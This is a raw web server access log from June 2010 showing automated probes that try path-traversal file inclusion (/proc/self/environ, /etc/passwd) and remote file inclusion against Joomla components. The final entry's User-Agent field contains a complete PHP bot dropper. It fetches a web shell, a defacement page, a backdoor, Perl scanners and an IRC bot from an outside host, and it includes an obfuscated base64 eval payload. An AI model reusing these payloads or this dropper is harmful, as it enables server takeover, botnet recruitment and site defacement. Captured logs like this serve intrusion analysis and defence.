72.32.58.140 - - [09/Jun/2010:22:05:39 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
72.32.58.140 - - [09/Jun/2010:22:05:40 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
72.32.58.140 - - [09/Jun/2010:22:06:03 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
67.108.254.21 - - [09/Jun/2010:22:06:04 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
222.236.47.182 - - [09/Jun/2010:22:06:26 -0500] "GET //includes/orderSuccess.inc.php?glob=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-""libwww-perl/5.79"
222.236.47.182 - - [09/Jun/2010:22:06:26 -0500] "GET //includes/orderSuccess.inc.php?glob=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-""libwww-perl/5.79"
218.38.243.71 - - [09/Jun/2010:22:06:42 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
218.38.243.71 - - [09/Jun/2010:22:06:42 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
218.38.243.71 - - [09/Jun/2010:22:06:42 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
218.38.243.71 - - [09/Jun/2010:22:06:43 -0500] "GET /logs/access_log.1274572800/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
218.38.243.71 - - [09/Jun/2010:22:06:45 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
218.38.243.71 - - [09/Jun/2010:22:06:45 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
218.38.243.71 - - [09/Jun/2010:22:06:46 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
218.38.243.71 - - [09/Jun/2010:22:06:46 -0500] "GET /logs/access_log.1274572800/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
218.38.243.71 - - [09/Jun/2010:22:07:12 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
72.32.58.140 - - [09/Jun/2010:22:08:38 -0500] "GET /logs/access_log.1274572800/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
72.32.58.140 - - [09/Jun/2010:22:08:38 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
72.32.58.140 - - [09/Jun/2010:22:08:38 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
67.108.254.21 - - [09/Jun/2010:22:09:17 -0500] "GET /logs/access_log.1274572800/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
67.108.254.21 - - [09/Jun/2010:22:09:17 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.108.254.21 - - [09/Jun/2010:22:09:17 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
67.15.152.183 - - [09/Jun/2010:22:09:37 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
67.15.152.183 - - [09/Jun/2010:22:09:37 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
74.54.78.146 - - [09/Jun/2010:22:09:58 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:09:58 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:09:58 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:09:59 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:09:59 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.15.152.183 - - [09/Jun/2010:22:09:59 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
74.54.78.146 - - [09/Jun/2010:22:10:00 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:10:00 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:10:01 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
72.32.58.140 - - [09/Jun/2010:22:10:13 -0500] "GET /logs/access_log.1274832000/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
67.108.254.21 - - [09/Jun/2010:22:10:59 -0500] "GET /logs/access_log.1274832000/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:11:16 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
118.129.166.213 - - [09/Jun/2010:22:11:19 -0500] "GET /logs/?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8947 "-""libwww-perl/5.79"
218.38.243.71 - - [09/Jun/2010:22:11:24 -0500] "GET /logs/access_log.1274572800/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
218.38.243.71 - - [09/Jun/2010:22:11:25 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
218.38.243.71 - - [09/Jun/2010:22:11:25 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
118.129.166.213 - - [09/Jun/2010:22:11:28 -0500] "GET /?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
118.129.166.213 - - [09/Jun/2010:22:11:36 -0500] "GET /logs/?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8947 "-""libwww-perl/5.79"
118.129.166.213 - - [09/Jun/2010:22:11:43 -0500] "GET /?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
218.38.243.71 - - [09/Jun/2010:22:13:28 -0500] "GET /logs/access_log.1274832000/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:13:40 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:13:40 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:13:40 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:13:47 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:13:47 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:13:47 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.15.152.183 - - [09/Jun/2010:22:13:57 -0500] "GET /logs/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
67.15.152.183 - - [09/Jun/2010:22:13:57 -0500] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
67.15.152.183 - - [09/Jun/2010:22:14:00 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
67.15.152.183 - - [09/Jun/2010:22:14:00 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
67.15.152.183 - - [09/Jun/2010:22:14:00 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
74.54.78.146 - - [09/Jun/2010:22:14:14 -0500] "GET /logs/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:14:15 -0500] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:14:19 -0500] "GET /logs/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:14:19 -0500] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
218.38.34.19 - - [09/Jun/2010:22:14:25 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
74.54.78.146 - - [09/Jun/2010:22:15:38 -0500] "GET /logs/access_log.1274313600//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:15:51 -0500] "GET /logs/access_log.1274313600//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.15.152.183 - - [09/Jun/2010:22:16:02 -0500] "GET /logs/access_log.1274313600//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
222.236.47.182 - - [09/Jun/2010:22:17:14 -0500] "GET /logs/access_log.1273622400//includes/orderSuccess.inc.php?glob=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 341 "-""libwww-perl/5.79"
222.236.47.182 - - [09/Jun/2010:22:17:14 -0500] "GET /logs/access_log.1273622400//includes/orderSuccess.inc.php?glob=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 341 "-""libwww-perl/5.79"
222.236.47.182 - - [09/Jun/2010:22:17:14 -0500] "GET //includes/orderSuccess.inc.php?glob=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-""libwww-perl/5.79"
222.236.47.182 - - [09/Jun/2010:22:17:14 -0500] "GET //includes/orderSuccess.inc.php?glob=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-""libwww-perl/5.79"
222.236.47.182 - - [09/Jun/2010:22:17:14 -0500] "GET /logs//includes/orderSuccess.inc.php?glob=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 319 "-""libwww-perl/5.79"
222.236.47.182 - - [09/Jun/2010:22:17:15 -0500] "GET /logs//includes/orderSuccess.inc.php?glob=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 319 "-""libwww-perl/5.79"
67.15.152.183 - - [09/Jun/2010:22:18:01 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
67.15.152.183 - - [09/Jun/2010:22:18:01 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
67.15.152.183 - - [09/Jun/2010:22:18:02 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
74.54.78.146 - - [09/Jun/2010:22:18:33 -0500] "GET /logs/access_log.1274832000/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:18:33 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:18:33 -0500] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
218.38.34.19 - - [09/Jun/2010:22:19:25 -0500] "GET /logs/access_log.1274832000/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
218.38.34.19 - - [09/Jun/2010:22:19:26 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
218.38.34.19 - - [09/Jun/2010:22:19:26 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
218.38.34.19 - - [09/Jun/2010:22:19:35 -0500] "GET /logs/access_log.1274572800/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
211.203.180.144 - - [09/Jun/2010:22:19:45 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
74.54.78.146 - - [09/Jun/2010:22:20:40 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:20:40 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:20:40 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:20:55 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:20:55 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:20:56 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
207.46.199.185 - - [09/Jun/2010:22:20:56 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.54.78.146 - - [09/Jun/2010:22:20:58 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:20:58 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:20:58 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:21:01 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:21:01 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:21:01 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:21:07 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:21:08 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
123.243.67.208 - - [09/Jun/2010:22:21:13 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
74.54.78.146 - - [09/Jun/2010:22:22:04 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:22:04 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
216.14.126.247 - - [09/Jun/2010:22:22:56 -0500] "GET /logs/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 361 "-""libwww-perl/5.834"
216.14.126.247 - - [09/Jun/2010:22:22:56 -0500] "GET /administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 356 "-""libwww-perl/5.834"
97.74.112.212 - - [09/Jun/2010:22:23:14 -0500] "GET /logs/tomdolan.pconline.com/?option=com_webeecomment&controller=http://www.inertialfate.za.net/casper/casper.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.834"
97.74.112.212 - - [09/Jun/2010:22:23:14 -0500] "GET /logs/tomdolan.pconline.com/?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 311 "-""\r ##[ ]##
\r ##[ casper_kae@yahoo.com ]##
\r ##[ Created by Kiss_Me or Alert ]##
\r ##[ Thanks to mama ]##
\r ##[ Casper_Cell Parijatah srono ]##
\r ##[ ]##
\r ####################################################
\r \");\r $admin = \"Kiss_Me\";\r $serverircs = array(\"telkomnet.id.allnetwork.org\",\"plasa.id.allnetwork.org\");\r $serverirc = $serverircs[rand(0,count($serverircs) - 1)];\r $urldata = \"http://www.inertialfate.za.net/casper/\";\r $injektor = \"sh.txt\";\r $defacer = \"def.txt\";\r $filepsy = \"psy.tar.gz\";\r $portpsy = \"8000\";\r $fileggdrop = \"eggdrop.tar.gz\";\r $filebotphp = \"bot.txt\";\r $crbots = 2;\r $filebotperl = \"iso.txt\";\r $filebotscan = \"scan.txt\";\r $filebotscan2= \"scan2.txt\";\r $filevirus = \"virus.txt\";\r $backdoor = \"gue\";\r \r $P = @getcwd();\r $perm = (@is_writable($P))?\"W\":\"R\";\r $perm = (is_array($perm))?join(\" \",$perm):$perm;\r $pathbot = $P;if($perm == \"R\"){if(substr($P,0,5) == \"/var/\"){$pathbot = \"/tmp\";}else{$pathbot = \"/tmp\";}}\r $permperl = (@is_writable($pathbot))?\"W\":\"R\";\r $permperl = (is_array($permperl))?join(\" \",$permperl):$permperl;\r #########patch#########\r if($perm == \"W\"){\r \tif(casperget()!=\"lain\"){\r \t\tcaspercmd(\"rm -fr *tx*\");\r \t\tcaspercmd(casperget().$urldata.$injektor.\" -O casper.php\");\r \t\tcaspercmd(casperget().$urldata.$defacer.\" -O index.php\");\r \t\tcaspercmd(casperget().$urldata.$defacer.\" -O \".$defacer);\r \t\tcaspercmd(casperget().$urldata.$injektor.\" -O \".$injektor);\r \t\tcaspercmd(casperget().$urldata.\"Ckrid1.txt -O Ckrid1.txt\");\r \t\tcaspercmd(casperget().$urldata.\"Ckrid2.txt -O Ckrid2.txt\");\r \t\tcaspercmd(casperget().$urldata.\"casper.txt -O casper.txt\");\r \t\tcaspercmd(casperget().$urldata.$filebotphp.\" -O \".$filebotphp);\r \t}else{\r \t\tcaspercmd(\"lwp-download \".$urldata.$injektor.\" -O casper.php\");\r \t\tcaspercmd(\"lynx -source \".$urldata.$injektor.\" -O casper.php\");\r \t\tcaspercmd(\"GET \".$urldata.$injektor.\" -O casper.php\");\r \t\tcaspercmd(\"lwp-download \".$urldata.$defacer.\" -O index.php\");\r \t\tcaspercmd(\"lynx -source \".$urldata.$defacer.\" -O index.php\");\r \t\tcaspercmd(\"GET \".$urldata.$defacer.\" -O index.php\");\r \t}\r }\r ###################\r caspercmd(casperget().$urldata.$backdoor.\" -O gue\");\r caspercmd(\"cd $pathbot;chmod 777 gue;./gue 5000 > /dev/null &\");\r ###################\r if((ex('perl -h')) && $permperl==\"W\" ){\r \t\tcaspercmd(\"cd \".$pathbot.\";rm -fr *.tx*;killall -9 perl\");\r \tif(casperget()==\"lain\"){\r \t\tcaspercmd(\"cd \".$pathbot.\";lwp-download \".$urldata.$filebotscan.\" -O \".$filebotscan);\r \t\tcaspercmd(\"cd \".$pathbot.\";lynx -source \".$urldata.$filebotperl.\" -O \".$filebotperl);\r \t\tcaspercmd(\"cd \".$pathbot.\";GET \".$urldata.$filebotperl.\" -O \".$filebotperl);\r \t}else{\r \t\tcaspercmd(\"cd \".$pathbot.\";\".casperget().$urldata.$filebotscan.\" -O \".$filebotscan);\r \t\tcaspercmd(\"cd \".$pathbot.\";\".casperget().$urldata.$filebotscan2.\" -O \".$filebotscan2);\r \t\tcaspercmd(\"cd \".$pathbot.\";\".casperget().$urldata.$filevirus.\" -O \".$filevirus);\r \t\tcaspercmd(\"cd \".$pathbot.\";\".casperget().$urldata.$filebotperl.\" -O \".$filebotperl);\r \t}\t\r \tcaspercmd(\"cd \".$pathbot.\";perl \".$filebotscan);\r \tcaspercmd(\"cd \".$pathbot.\";perl \".$filebotscan2);\r \tcaspercmd(\"cd \".$pathbot.\";perl \".$filevirus);\r \tcaspercmd(\"cd \".$pathbot.\";perl \".$filebotperl.\" \".$serverircs[rand(0,count($serverircs) - 1)]);\r \tcaspercmd(\"cd \".$pathbot.\";perl \".$filebotperl.\" \".$serverircs[rand(0,count($serverircs) - 1)]);\r \tdo {\r \tcaspercmd(\"cd \".$pathbot.\";perl \".$filebotperl.\" \".$serverircs[rand(0,count($serverircs) - 1)]);\r \tsleep(43200);\r \t} while(true);\r } $byPTeU='XY7BasMwEETvgfyDEIKVIXXuDqYKxMU9xbWdXpogVFuxRSXL2HIP/fpKTSi0e9jDzNuZXa/IMqkUeudGiBFlhFdZ+ZqVb5DXdVHBBT0imAElaFi0jlAMyXbryX8gz49V7eE/Rpm9nLKq5qfyGS679YrkKTzcB3akFU6kKPT7M5L70046OXxSfAvg+8OhxNHdhFlcZQIxU4PiHqQ4CNzYVv4ybOxHvgzCSOqloCBW5AU/Vr7dCKUpoC9r3pVsrNaycXZinbWdlsGMG2tg8/OQ3+G7DX6arEnQ7JZRtb1oPuTEbgEBPk/nAUc++hs=';$aUiMmA=';)))HrGClo$(rqbprq_46rfno(rgnysavmt(ynir';$veaZlT=strrev($aUiMmA);$MBAVHh=str_rot13($veaZlT);eval($MBAVHh);\r ####################\r if($permperl==\"W\"){\r \tif(casperget()==\"lain\"){\r \t\tcaspercmd(\"cd \".$pathbot.\";lwp-download \".$urldata.$filepsy.\" -O \".$filepsy);\r \t\tcaspercmd(\"cd \".$pathbot.\";lynx -source \".$urldata.$filepsy.\" > \");\r \t\tcaspercmd(\"cd \".$pathbot.\";GET \".$urldata.$filepsy.\" > \");\r \t}else{\r \t\tcaspercmd(\"cd \".$pathbot.\";\".casperget().$urldata.$filepsy.\" -O \".$filepsy);\r \t}\r \tcaspercmd(\"cd \".$pathbot.\";tar -zxvf \".$filepsy);\r \tcaspercmd(\"cd \".$pathbot.\"/.psy;./config \".$portpsy);\r \tcaspercmd(\"cd \".$pathbot.\"/.psy;./fuck;./run\");\r }\r ##################\r casperbotphp($crbots);\r ###########################################\r function getdisfunc() { $rez = explode(\",\",@ini_get(\"disable_functions\")); return (!empty($rez))?$rez:array(); }\r function enabled($func) {return (function_exists($func) && is_callable($func) && !in_array($func,getdisfunc())) ? TRUE : FALSE; }\r function ex($cfe) {\r $res = '';\r if (!empty($cfe)) {\r if(function_exists('exec')) {\r @exec($cfe,$res);\r $res = join(\"\\n\",$res);\r } elseif(function_exists('shell_exec')) {\r $res = @shell_exec($cfe);\r } elseif(function_exists('system')) {\r @ob_start();\r @system($cfe);\r $res = @ob_get_contents();\r @ob_end_clean();\r } elseif(function_exists('passthru')) {\r @ob_start();\r @passthru($cfe);\r $res = @ob_get_contents();\r @ob_end_clean();\r } elseif(@is_resource($f = @popen($cfe,\"r\"))) {\r $res = \"\";\r while(!@feof($f)) { $res .= @fread($f,1024); }\r @pclose($f);\r } else { $res = \"Ex() Disabled!\"; }\r }\r return $res;\r }\r function casperbotphp($jml) {\r \t$loadbot = 0;\r \tdo {\r \t\t$loadbot = $loadbot + 1;\r \t\tinclude( $urldata.$filebotphp.\"?\" );\r \t\tif($loadbot >= $jml){break;}\r \t} while(true);\r }\r function casperget() {\r \tif (ex('wget --help')) \t\t\t{ return \"wget \"; }\r \telseif(function_exists('curl_version')) { return \"curl -O \";}\r \telseif(ex('fetch --help')) \t\t{ return \"fetch \"; }\r \telse\t\t\t\t\t{ return \"lain\"; }\r }\r function caspercmd($cmd) {\r \tif (enabled(\"exec\")) \t{exec($cmd); }\r \telseif (enabled(\"shell_exec\")) \t{shell_exec($cmd); }\r \telseif (enabled(\"system\")) \t{system($cmd); }\r \telseif (enabled(\"passthru\")) \t{passthru($cmd); }\r }\r ?>\r libwww-perl/5.834"
